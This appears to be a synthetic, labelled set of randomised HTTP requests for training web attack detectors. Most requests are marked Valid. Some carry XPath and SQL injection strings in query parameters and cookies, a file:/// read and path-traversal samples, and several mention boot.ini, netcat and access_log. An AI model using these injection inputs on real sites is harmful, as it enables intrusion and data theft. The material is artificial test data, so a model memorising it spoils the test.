GET /uxP9/nni/between.tRRuZdTjmzVwhere/etzdn7encirs/u-3LHlOi.sh?FMJchL=386a4&o7s35ayew2eti=evarn+oe&ae=34990&bgal=a+etZ%24hm%2Bformxts&YuhT=eTEPcOsl55v&stbdOtlsyu0=oi+suYbTr5b%2FUesddropC%29f&vfx8unz=w9%40DUfxn2&hn=%280ksbxto&eSts8=ana&bhmskahgtan=69&ikugNptnhQ=sMA&KG-ymocha=ontfhuail&OA0dZlFpdz2=005791104&tdyaostelsaeau=e%5Dwtaertpositionl HTTP/1.1
Host: www.n6ed0sna.gov
Connection: close
Accept: audio/basic
Accept-Charset: cp-950, euc-jp;q=0.4, iso-8859-8, x-mac-arabic, iso-8859-3;q=0.8
Accept-Encoding: gzip, gzip;q=0.9, identity;q=0.9, deflate, compress;q=0.5
Accept-Language: nsnln-4Dtze;q=0.5, h7o-ilS, n-aw3rl;q=0.9, Mmn-2o4
Cache-Control: max-stale=9474
Client-ip: 235.44.149.89
Cookie: netsztoa=eacgosYpd2se;aodzc4icnto=i;nseneEnspa=ncsoimTs;kun5NndAt3a=23562559
Cookie2: $Version="5"
Date: Tue, 22 May 07 11:44:11 CET
ETag: "bLNGsv_WFsHfUWx1.kz_"
Expect: 100-continue
From: rdny@hctpuostk.cz
If-Modified-Since: Mon, 11 Sep 06 04:00:14 GMT
If-Unmodified-Since: Sun, 25 Mar 07 08:29:23 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 16 Sep 08 14:22:57 UTC
Max-Forwards: 391
MIME-Version: 3.8
Pragma: ceidtf='adx'
Proxy-Authorization: Digest realm
Authorization: Aerf wexZot=okwho6ts
Range: -87,9893-
Referer: http://r2yteu.com/TeInua/tstir/wqtrch.sh
TE: trailers
Trailer: Range
User-Agent: huaxnaiAbot4
UA-CPU: Sparc
UA-Disp: 929,7380,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: 7.5 130.20.56.53
Transfer-Encoding: identity
Upgrade: Rhati/3.5, utw/4.6, 9reuu/0.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 3494344
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17892
Start - Id: 19629
class: Valid
GET /sttsptRsaS/ss7ibhneeinne/Jnahco2oaoae7hodl/qSVr8H1atW.shtml?BT9scripttb-xR=ldTcY&6oe77m2ptisuso=9689980&bqusraan2=gmdtbUm5w&etrgh=T&cSeier=36 HTTP/1.0
Host: www.EtsHefNsa.ch
Connection: r6ata
Accept: image/*;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 7omra-vbcejsz, 8lzsd-Lly, s5-l2QFd;q=0.8
Cache-Control: no-cache
Client-ip: 79.76.165.215
Cookie: in=rytgroup bye;eoDUgo6=93736;ce=ystCt
Cookie2: $Version="17"
Date: Sun, 25 Apr 04 14:31:46 CET
ETag: "gwWlvqw-Hsu3xuRd"
Expect: 100-continue
From: arin@CIbt.st
If-Modified-Since: Wed, 21 Oct 09 18:47:59 UTC
If-Unmodified-Since: Thu, 17 Sep 09 18:12:38 CET
If-Match: *
If-None-Match: "PxGn6cfL9v6oB4lW48o"
If-Range: *
Max-Forwards: 392
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM YVRzb3BlZ2lBc2hhb3Rwb3JwZ2hpZTNzQW5wQWg0b25kV3NpdmlleWRl
Authorization: Basic dllkVXBlbDpyczJsenNTcA==
Range: 3666-92,-7
Referer: http://4cehs.cz/nsdnral/tEomWst/n8al.wav
TE: trailers,chunked
Trailer: Connection
User-Agent: lmni/1.0
UA-CPU: StrongARM
UA-Disp: 1867,055,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 2031x847
Via: HTTP/0.8 17.227.109.169
Transfer-Encoding: tehgt
Upgrade: emf/6.5
Warning: 278 89.82.235.229 "a0hcdrrhmaORaahd67Hi" 
X-Forwarded-For: 161.92.181.94
X-Serial-Number: 84453733272881684848
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19629
Start - Id: 19505
class: Valid
GET /mbl2fo/owtiE5hesHU6dmijs/lp@gaN3LKKp2H9@@TWcV/tdoli/cnenielttz0lNdxdeKzq.php4?bmtmSoet3dn7h=osSE HTTP/1.1
Host: www.m6nri.ch:80
Connection: tgityol
Accept: text/plain
Accept-Charset: iso-10646-ucs-2, ks_c_5601-1987;q=0.4, x-mac-arabic, euc-cn, iso-8859-9
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: 8Pilopl=lineirw
Client-ip: 53.121.233.89
Cookie: dmtfsOh=975;Tleih3fc9=;@Fm;dehre=isu7coNbin;IhjSe0=estyle;atere8=brprocessing-instructiona7Zacoo/ug'riboot.ini;Ieeamh4t=han z/dn
Cookie2: $Version="6"
Date: Tue, 30 May 06 07:25:23 GMT
ETag: "SVrVwZJDn6pIgWdg"
Expect: 100-continue
From: scdiN@rl4aweo.com
If-Modified-Since: Tue, 17 Aug 04 04:47:17 UTC
If-Unmodified-Since: Mon, 31 May 04 09:55:50 CET
If-Match: "ciHXH5zQYLskZUblWE"
If-None-Match: *
If-Range: Wed, 23 May 07 11:58:55 UTC
Max-Forwards: 160
MIME-Version: 7.2
Pragma: t='leTn'
Proxy-Authorization: Digest uri=http://www.3p3m.de/49ldleap/eaosgltI/jsAreodj/5amiaon.bin
Authorization: Digest uri=http://geil.net/xrmir.jsp
Range: 3024-,3311-971779,259112-9
Referer: http://www.txose0ae.ch/Haezno.cfm
TE: trailers
Trailer: Max-Forwards
User-Agent: Mozilla/1.7 (Machintosh; U; PPC 0.5; 7t-ci; rv:3.6.2) Gecko/41761232
UA-CPU: x86
UA-Disp: 4215,3072,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 570x2839
Via: HTTP/0.5 35.108.79.220
Transfer-Encoding: identity
Upgrade: eege/1.4
Warning: 327 www.0Udthi.gif "maedbbAi" "Sun, 01 May 05 02:24:09 UTC"
X-Forwarded-For: 229.29.101.243
X-Serial-Number: 7307968388590
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19505
Start - Id: 14813
class: Valid
GET /X_mailJ.jQWqhHp8.msf?CTcTUglogLGIjW=afereqtqebbaxp_&rowasItttl44es=7iL%40sijegP0 HTTP/1.1
Host: www.NyOteAS.de
Connection: keep-alive
Accept: */*
Accept-Charset: iso-8859-5, iso-8859-4, iso-8859-4, iso-8859-6;q=0.7
Accept-Encoding: *
Accept-Language: i3tmr0es-cw, ir-eepgnouk, 7eedyel-ic, Oeaw5gc-ner, ltrs3-b0n6;q=0.7
Cache-Control: max-age=14733
Client-ip: 237.183.88.12
Cookie: caNN=nuwh;talwrion48eots=itMzvno;uW5n2Be=eit;Chwramee=/opt2i
Cookie2: $Version="935"
Date: Sun, 19 Sep 04 02:46:04 UTC
ETag: "papFRaZdklW3yVG"
Expect: 100-continue
From: nOeesl@pemet.it
If-Modified-Since: Tue, 09 Mar 10 09:39:09 GMT
If-Unmodified-Since: Sun, 27 May 07 18:16:43 GMT
If-Match: *
If-None-Match: "fV.JAIDh7QLHXGrj"
If-Range: "Sf@Cb4rcMHoK-N7.8"
Max-Forwards: 4
MIME-Version: 6.9
Pragma: 2vti=eqtCpt
Proxy-Authorization: gresSi t3uet=opnt
Authorization: Digest cnonce="zTNeien"
Range: 60797-
Referer: /trEtdtoe/deosm.dll
TE: trailers,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/8.8 (Machintosh; U; PPC 8.7; fc-se; rv:9.1.8) Gecko/34780350
UA-CPU: MIPS
UA-Disp: 1041,483,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1451x6345
Via: 0.4 www.thNau.tiff, FTP/4.5 www.nerRtTt.css, edu/7.3 210.44.180.247:4
Transfer-Encoding: gzip
Upgrade: altl/2.2
Warning: 387 165.171.90.131 "hiaiten8hm8" 
X-Forwarded-For: 220.203.31.112
X-Serial-Number: 48297447626041948628
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14813
Start - Id: 2532
class: Valid
GET /c5rwsathgnes/rhl0lj6uqdToeu.jpg?zjesErylLu3tss=ymhaooycb&i5usemlncghI=27859 HTTP/1.0
Host: www.Canniwsa.fr:292
Connection: IEpeht5
Accept: audio/basic;q=0.5, image/png;q=0.6
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.0, identity;q=0.8
Accept-Language: i-vm
Cache-Control: max-age=28954
Client-ip: 171.191.7.222
Cookie: Emizsr=dtfnc
Cookie2: $Version="1"
Date: Tue, 28 Dec 04 18:26:21 UTC
ETag: "lqnni2_FDZ0vXd8lxb"
Expect: 100-continue
From: nnxgy@Ttnc1ez.uk
If-Modified-Since: Wed, 14 Apr 10 10:03:18 CET
If-Unmodified-Since: Tue, 14 Mar 06 03:59:40 CET
If-Match: *
If-None-Match: *
If-Range: "RMYmstwJ2LDJbSa7vpR"
Max-Forwards: 3792
MIME-Version: 8.1
Pragma: ETEia=tc
Proxy-Authorization: Digest uri=/tlsstete/Eaolaro/6wsnstto.shtml
Authorization: rte9d xtnd=2uyepni
Range: 4325-
Referer: /ssU3te.php
TE: deflate;q=0.6
Trailer: Referer
User-Agent: Mozilla/5.6 (Machintosh; U; PPC Mac OS X 3.7; qd-wn; rv:8.8.4) Gecko/97397265
UA-CPU: MIPS
UA-Disp: 284,569,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6834x6538
Via: 8.3 www.sMeaae.gif:712
Transfer-Encoding: gzip
Upgrade: bae/3.4
Warning: 301 www.naet.js "Hsh2meee5a" "Sat, 22 Apr 06 15:10:43 UTC"
X-Forwarded-For: 8.183.220.41
X-Serial-Number: 347745233258688600
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2532
Start - Id: 35705
class: XPathInjection
GET /m6JdiUkTKsc.g/a23h6/home-g_xlZ/boaSt0tE2nni4scttten.tiff?htus2st=1&mEaermewrernt=eWG-m6&obodpenYddaia=8840808&4JW7NM=systemec&xes=dr&eRtoaps3=+ldfb7%27&ebrw=sae2hot%27+++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D+or+%27m8%27++%3D++++%27&tdhmadhr=o+6li5DiziAq&wfvth9gesmthNia=Xr+%29i&w1_s=439568&n7skb=tlisl+vwtaachildttelneto&xKYjboot.iniRmailC=xylg%5C%3Chvcbr+rre&dwe=+e%3FtlRp HTTP/1.0
Host: www.lAia.be
Connection: liratOd
Accept: audio/basic;q=0.7
Accept-Charset: *
Accept-Encoding: gzip;q=0.9, deflate;q=0.9
Accept-Language: *
Cache-Control: max-stale=50570
Client-ip: 137.209.93.95
Cookie: l5updateMkL2oWk=oformg6U\;2Ncplov=7780890;kaMu=6q06lvF;es5eHehmirza6ce=49748812;rtnAnwi=686833
Cookie2: $Version="52"
Date: Sat, 02 Dec 06 24:28:06 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: 0iiTea@WooaceteB.de
If-Modified-Since: Wed, 11 Jul 07 16:10:40 UTC
If-Unmodified-Since: Fri, 15 Sep 06 01:40:54 GMT
If-Match: "BMF6hLDOVgNnU1O7Vjw"
If-None-Match: "Flzf1U4IT.xEqpmp1ncI"
If-Range: *
Max-Forwards: 277
MIME-Version: 3.9
Pragma: n9=8
Proxy-Authorization: ndsOth k8so=nlmc
Authorization: NTLM ZWtucHBJbW50dHN0YnJlZ2Nub3RpZUVjZXUyZGE5Zzh5c1I=
Range: 5225-,8-9,1-
Referer: http://nklmtfrq.uk/nNhmqs/yEtclet.mpeg
TE: chunked,deflate;q=0.6,deflate
Trailer: User-Agent
User-Agent: Mozilla/8.1 (X11; U; Unix 0.4; yh-qT; rv:9.1.2) Gecko/65818452
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 656x763
Via: 4.6 221.235.251.50, 4.9 www.gitsten.css, HTTP/7.3 72.125.189.113
Transfer-Encoding: seteA
Upgrade: acPhne/6.3, xettw/7.0
Warning: 497 www.suB9rrh.png "orshmmmaTi2orsdnwe" "Sun, 22 Nov 09 02:52:27 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35705
Start - Id: 18191
class: Valid
GET /8O5u/vinEn5oa/W4m0.png?AmpTeq=n%3Dm&hc=r%3Doi&mtyettlngszmt=ssult+&hiez=kKlpYaOoj&vMbphTchild4=0u6fs&tighceo=l+TnkevaljfE&HPSt=22055779 HTTP/1.1
Host: 253.18.32.132
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.3
Accept-Encoding: identity;q=0.3, identity;q=0.5, gzip;q=0.6
Accept-Language: *;q=0.1
Cache-Control: max-stale
Client-ip: 240.154.228.42
Cookie: V0bQhttp_d=0;ois=4
Cookie2: $Version="78"
Date: Sun, 25 Oct 09 06:37:15 UTC
ETag: W/"76YR5b4LTKm17we3CsY"
Expect: aaonKjt5=Elnth;oIrtoa0c=y3umpou0
From: T581@xdel.gov
If-Modified-Since: Mon, 10 Apr 06 21:49:08 GMT
If-Unmodified-Since: Mon, 14 Aug 06 16:41:42 CET
If-Match: "f-rNdCh4JxzwXkI"
If-None-Match: "gZevu5_Sm9fwFTH5G"
If-Range: Wed, 22 Aug 07 07:23:56 GMT
Max-Forwards: 2
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: Basic Zkllc3dPOm5BamV1cg==
Authorization: msgd6 7xad=od9Ao
Range: 666465-916
Referer: http://www.e19rwa.com/lnnngfcd.php
TE: gzip;q=0.4,trailers,chunked;q=0.4
Trailer: Host
User-Agent: nuSyiEr/7.8
UA-CPU: 68000
UA-Disp: 904,033,16
UA-OS: Win98
UA-Color: color16
UA-Pixels: 255x381
Via: sbtnw/4.4 www.trAnofte.jpeg, 0.1 111.43.12.121, 0.6 www.TE6ntr3.shtml
Transfer-Encoding: eab3
Upgrade: hicew/7.4, 1ok/5.7, 4ba/6.1, Inm/8.9, hutr/5.7
Warning: 282 www.mtd6lng.tiff "rqniee0sohncxoe" 
X-Forwarded-For: 88.31.41.115
X-Serial-Number: 93769188235463446017
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 18191
Start - Id: 28716
class: Valid
GET /fExota/iTscFWrr/H2thM2/sfp/eta4vonO1nteouha.jpg? HTTP/1.0
Host: 139.176.181.227
Connection: mmcsh2
Accept: application/zip, audio/x-wav, video/mpeg
Accept-Charset: windows-1255, shift_jis, windows-1250;q=0.7, x-mac-chinesesimp;q=0.2, koi8-r;q=0.4
Accept-Encoding: *
Accept-Language: xb-ecp6
Cache-Control: rr=cgabiY
Client-ip: 178.98.193.61
Cookie: olpegx3tEibxu7h=eN.dID5
Cookie2: $Version="0"
Date: Sun, 28 Sep 08 04:54:51 CET
ETag: W/"ZTtXFp@@SCj_TFuFaKN"
Expect: 100-continue
From: cmNaehb@twerq2.gov
If-Modified-Since: Thu, 16 Aug 07 17:22:23 UTC
If-Unmodified-Since: Sun, 28 Mar 04 15:18:47 GMT
If-Match: *
If-None-Match: "aqQsLeSgccV6aDfr"
If-Range: "HGQ5XiWljH5.YQDoagZ"
Max-Forwards: 5312
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: -5
Referer: http://xeepi.cz/foynafE.tar
TE: chunked,gzip,chunked;q=0.1
Trailer: If-Unmodified-Since
User-Agent: Mozilla/0.2 (X11; U; Solaris 5.3; hi-ec; rv:9.7.6) Gecko/04906557
UA-CPU: 68000
UA-Disp: 9543,263,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 621x541
Via: 0.0 223.210.13.163
Transfer-Encoding: compress
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 850 209.179.191.174 "pmem" "Wed, 31 Mar 04 13:18:33 CET"
X-Forwarded-For: 41.255.95.49
X-Serial-Number: 244229732731
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28716
Start - Id: 44662
class: PathTransversal
GET /cDS/UW7aV8L_wh/sate2haw/TsvnCDK/dZdegoagotnbti/Iy-/r8d4hgu/smsAadancfpeeninjut/5e8-K.9Ui0/amghlWt0Z/roellit.exe?gIeiXkv=e+a&rar=rU6WqLgvEssu&4EtmnrtnSs=mmp1oaztme3ohofibw&dyetdtrk7urw=eCS HTTP/1.0
Host: www.o7oh.it
Connection: nmehtr
Accept: application/zip;q=0.3, application/*, audio/x-wav;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: rndpN3en-ih;q=0.2, oo9dscEe-e, n-ie3, yNMA3-aneeyed, s2rbll-t2seHatt
Cache-Control: HPnaisa='lohCE'
Client-ip: 48.43.170.158
Cookie: dsso=%umve;etatO3ussh=reErb;GlFbWPI=collection(  file:///c:/moa/41oc.xml     );naotrLbhctuatsa=ijuda
Cookie2: $Version="591"
Date: Wed, 28 Feb 07 23:16:53 CET
ETag: "kPNBCPl1@s66h2STZ4t2"
Expect: dgct7Ia
From: eeuabRn@lal2mty.ch
If-Modified-Since: Fri, 20 Mar 09 18:26:54 UTC
If-Unmodified-Since: Thu, 04 Dec 08 08:50:41 UTC
If-None-Match: "pRjdnLfcnQyk7Z4"
If-Range: Sat, 18 Oct 08 05:37:38 GMT
Max-Forwards: 05
Pragma: no-cache
Authorization: Basic dW1laW46T2ludHRpNWg=
Range: 316-826
Referer: /dtetret/tinlfpze/ea6ht4ho.htm
TE: trailers,gzip;q=0.6,trailers
User-Agent: lntie7I/8.1.4
UA-OS: Windows 95
UA-Pixels: 827x397
Via: HTTP/7.8 145.208.135.91
Transfer-Encoding: compress
Upgrade: ewjer/3.6, iieee/3.2, dbnoN/0.4, afTm/9.7
Warning: 228 172.128.177.184 "teeeuO" 
X-Serial-Number: 17192
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44662
Start - Id: 30099
class: Valid
GET /9y1GmuSd6OpND/CallSq_Wdelete-T7N6/ttwttIdzssng/iL@8boYqn1Cl9eUFH3./rNp3jmXP/o2Z.GTd0tOVaEfW7yZ.aspx?em=erm%407os HTTP/1.1
Host: 170.95.154.94:12868
Connection: oaRibxyl
Accept: */*;q=0.5
Accept-Charset: *;q=0.0
Accept-Encoding: deflate;q=0.6, identity;q=0.6, identity;q=0.9, compress, compress
Accept-Language: *;q=0.9
Cache-Control: max-age=9545
Client-ip: 21.178.55.72
Cookie: ch=s6p1is sI=FyA9]~i;laes=eYVuT1-6H
Cookie2: $Version="8"
Date: Sat, 29 May 04 17:30:59 UTC
ETag: "XJhc8uKyTfzrGtBR3B"
Expect: 100-continue
From: eoeue@xutXcset.it
If-Modified-Since: Thu, 31 Dec 09 04:05:24 UTC
If-Unmodified-Since: Sun, 15 May 05 01:59:16 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 88
MIME-Version: 9.1
Pragma: Nx='lio5'
Proxy-Authorization: NTLM dDNhY2RiZWVrZGVvdHlnYW50YWlJMzNpcjFpNnBvZHl4RHJydGJvdGxtNA==
Authorization: NTLM RXJudEJ3ZWN0NHR1N2Fzc282cDllM3BodG9pYmVvaUhlc2l2bHF0b3Nlbw==
Range: -5
Referer: http://www.uihet.net/eti7/rilola4/6c0bp/ea6iy.exe
TE: deflate
Trailer: Date
User-Agent: mbCU6DnEwX http://www.hzaudsb.org
UA-CPU: MIPS
UA-Disp: 978,2584,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 118x9358
Via: FTP/1.3 www.u8shn.tiff:66, 6.4 www.Wx2inw.tiff, 2.9 71.30.107.151
Transfer-Encoding: mus3e
Upgrade: AajeA/4.4
Warning: 166 93.46.119.175 "apeeou6Udinzauet" "Thu, 11 Dec 08 02:46:24 UTC"
X-Forwarded-For: 129.252.117.122
X-Serial-Number: 131299472861769232
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30099
Start - Id: 10034
class: Valid
GET /led/Wiaccess_logQR74Fm/cBgeSExj/FoWu/ao/plRO15/oRremat/FsdveMhmmdtcc/uC-qWbCtFE/sheMwoodGtxT8o/0SSQ0I.php3? HTTP/1.1
Host: 125.184.16.151:9683
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.3
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 114.244.231.152
Cookie: locationifO1OhftpNl=97
Cookie2: $Version="925"
Date: Sat, 04 Aug 07 02:12:18 GMT
ETag: "B6zqjrLs@02pljvr"
Expect: 100-continue
From: ienkiXd@ndosa5.gov
If-Modified-Since: Fri, 07 Sep 07 18:05:48 GMT
If-Unmodified-Since: Mon, 29 Dec 08 12:08:15 CET
If-Match: "T.7tS@twL5_k@xt0Jz8H"
If-None-Match: "19pGQbYjuIVLeIgDaVM"
If-Range: Sun, 22 Oct 06 17:18:50 GMT
Max-Forwards: 4
MIME-Version: 1.2
Pragma: no-cache
Proxy-Authorization: npwt Loartcsg=sdhi
Authorization: NTLM bWFvYmVlbmhobXJybmxoZWVFYW5OdWVoaDIxY21kRTJl
Range: 0-,-74494,959420-8
Referer: /vPttq/arIe7ge/tkdgntt/rftnwcme/nirI.msf
TE: deflate;q=0.7
Trailer: Cache-Control
User-Agent: Mozilla/0.2 (Machintosh; U; PPC 1.9; sT-8i; rv:9.1.2) Gecko/34372953
UA-CPU: 68000
UA-Disp: 528,194,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 470x7016
Via: FTP/9.7 212.127.105.20, 2.2 180.54.71.50, 1.0 www.8uaoaow.jpg
Transfer-Encoding: identity
Upgrade: asoetw/7.0
Warning: 441 www.sNfaestc.html:841 "a3fh" 
X-Forwarded-For: 156.117.248.41
X-Serial-Number: 88179954057
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10034
Start - Id: 45234
class: PathTransversal
GET .////////////////////////? HTTP/1.0
Host: www.rnsens.it
Connection: close
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: tnod-DQoj, nor-2, r5sat-egdf
Cache-Control: min-fresh=97
Client-ip: 83.132.12.183
Cookie: terenipomAenlsa=343231;inputBKpvF4f=qat;uYRDNxgroup byQq_=licphe c;txdaf=232
Cookie2: $Version="8"
Date: Sat, 30 Sep 06 14:40:09 CET
ETag: W/"t2Ytcd_RbO7gw0dHf"
Expect: Ieam=7yoy
From: nr1cs36r@ar1hsxlt.org
If-Modified-Since: Mon, 11 Apr 05 08:07:35 GMT
If-Unmodified-Since: Sun, 29 Apr 07 07:15:34 GMT
If-Match: *
If-None-Match: "C.H7XAnMwTF16WeK"
If-Range: *
Max-Forwards: 17
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: Digest qop=evai40
Authorization: NTLM c2N0cDN5bHRtcWlydG9hbW43M2RidHU3dHh3bmFlbzZ0RVJscjhrbjVsZG5jYmM=
Range: 220-5761,42620-
Referer: http://rowoEquf.de/5eom13/uE4aad3/tfcrsrem/pat5hd0.png
TE: chunked;q=0.3,trailers
Trailer: Expect
User-Agent: evn3eeoxi/6.1.4
UA-CPU: x86
UA-Disp: 675,5988,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 2272x045
Via: HTTP/3.9 www.ee60tcs.shtml
Transfer-Encoding: identity
Upgrade: ttt5/9.0, laolhr/8.9, geei2/4.3
Warning: 831 www.rueghla.htm "ecA7eejeodtti" 
X-Forwarded-For: 42.110.150.96
X-Serial-Number: 706890452941318
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45234
Start - Id: 30214
class: Valid
GET /nycCtbty2hted/sansanHyrutpeenftp/rrmh1SdayS1/sViX/OkinwpdyolShNJt/nPbe2@yb/5V9p24PhjoRFxkf10R/ads/sRiBg71LxgbHfOPk.tiff?jutrleos=ekpf6qFhKjZ&mIsnooatd2fdu=oinikeoa3wn&sbwllk4do=loe3empeajaxhk&miauitIOdrEpirs=l6%25kzirsamaSg&edEaedbeuFrt=%3AmmeuA1echobf-d1t&id=l+iydriv%2Fssn+amhos%3B&hirtvoNtHeoah=eBsIaZWel&lierfhos9le=68&ja=prwnspd3aa&TnaI0eie=8755&ea2@hYnvI=%40tn%5Dtmpgv&dHYhcWpd=bra%28+ HTTP/1.0
Host: www.Eqixh2u.fr
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=383
Client-ip: 15.120.71.38
Cookie: eu72tii8Nacuo=s@npbeMT.A7;6ettUt8EmtO=eghs;sn=arn2teahumaE60me8r;b7kegigmhacL=u;fsihqeibhjdlekm=lEou
Cookie2: $Version="68"
Date: Sat, 15 Jan 05 09:48:59 UTC
ETag: W/"GmsUi8tlrlwJp5@w"
Expect: 100-continue
From: earth@kdnEdty.biz
If-Modified-Since: Sat, 06 Mar 10 08:47:24 UTC
If-Unmodified-Since: Thu, 26 Aug 04 16:04:07 CET
If-Match: *
If-None-Match: *
If-Range: "qpArCk6AWiMMAnE@j_"
Max-Forwards: 11
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: sshsi goajiat=4rtoL
Range: 346642-698,469-394,8-
Referer: http://www.cznmGm.fr/yhgwo4ft.asmx
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/9.5 (Machintosh; U; PPC 8.7; ij-an; rv:1.0.2) Gecko/27875180
UA-CPU: PowerPC
UA-Disp: 058,5611,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 8300x7095
Via: 4.1 www.OThTdt.js
Transfer-Encoding: gzip
Upgrade: eftf/4.4, ddnAte/3.1
Warning: 771 181.119.169.184:84 "ceiue5imcozmnplEe" 
X-Forwarded-For: 46.52.217.2
X-Serial-Number: 19194011026
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 30214
Start - Id: 42777
class: SqlInjection
PUT /eP0INuBNIKU/9aTUUALWdWQGB89d4/eyewc9Lrtpi/D4-Qbgsound-M1ncqvbscriptm1AO/hsvQ@ADGuAtNYm2/tjttcascaed/5gnij41qoaihdTrct/1lib@1boot.inilN/r3AyN1ZdxzLNo6iJbu/tqheloexui9E/netcatJiosock_streamt.Vk_/o4uitzed.mspx? HTTP/1.0
Content-Length: 118
Content-Language: a3,vw,d
Content-Encoding: deflate
Content-Location: http://sgmsa.net/x0aOofku/toFhehea/IV2Phb.txt
Content-MD5: Y3BucjNoaGVlcTlzZ25oZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 13 Sep 09 12:59:47 CET
Last-Modified: Thu, 16 Feb 06 19:23:57 UTC
Host: www.wnpr3bSm.net
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.7
Accept-Language: o1eincli-n;q=0.4, ijGmer-um7nnb, u9a-oitooif, dvkeuAc6-s6Aibheo;q=0.1
Cache-Control: max-age=96
Client-ip: 153.202.199.72
Cookie: rcp_pY8=ieefEs;lnihkwsdh=sswcoienea;du=336154180;sBAO0smetaSK=$;stht8four= 6;f3RaUW1L1k=or  0<>(select   count(*)    from  srm5i)
Cookie2: $Version="66"
Date: Sat, 01 Nov 08 23:29:47 GMT
ETag: "WF4A4@FXbzWEO3h-"
Expect: le7n
If-Modified-Since: Thu, 17 Dec 09 04:44:42 CET
If-Unmodified-Since: Mon, 25 Jul 05 07:31:16 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 03 Jan 08 19:25:59 GMT
Max-Forwards: 1
MIME-Version: 2.2
Pragma: ea='ekeVbco'
Proxy-Authorization: 1oi2hy rTepl=hneaC
Authorization: Basic aHBjcjRhYTpvdWVv
Range: 169067-0
Referer: http://eoea.de/p4eule.bin
TE: gzip;q=0.7
Trailer: Authorization
User-Agent: Mozilla/6.5 (X11; U; Open BSD i586 9.8; ai-8g; rv:7.9.5) Gecko/04517658
UA-CPU: PowerPC
UA-OS: Linux
UA-Pixels: 449x877
Via: FTP/5.9 249.135.113.171, FTP/1.8 49.36.11.166
Transfer-Encoding: lnai3; e5sbeSHt=ptee8erh
Upgrade: glst/0.2
Warning: 901 www.ooto5.jpg "hxEMfthhileDx" 
X-Serial-Number: 58260161
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GXAjxp_style=icmde ot&E9eesemuhoohiby=access_log+Tse]u8=x&1auimluye=o_OwNvj@YtZ&gn62n=6561&mb_3N80buNoptl=4529

End - Id: 42777
Start - Id: 38573
class: LdapInjection
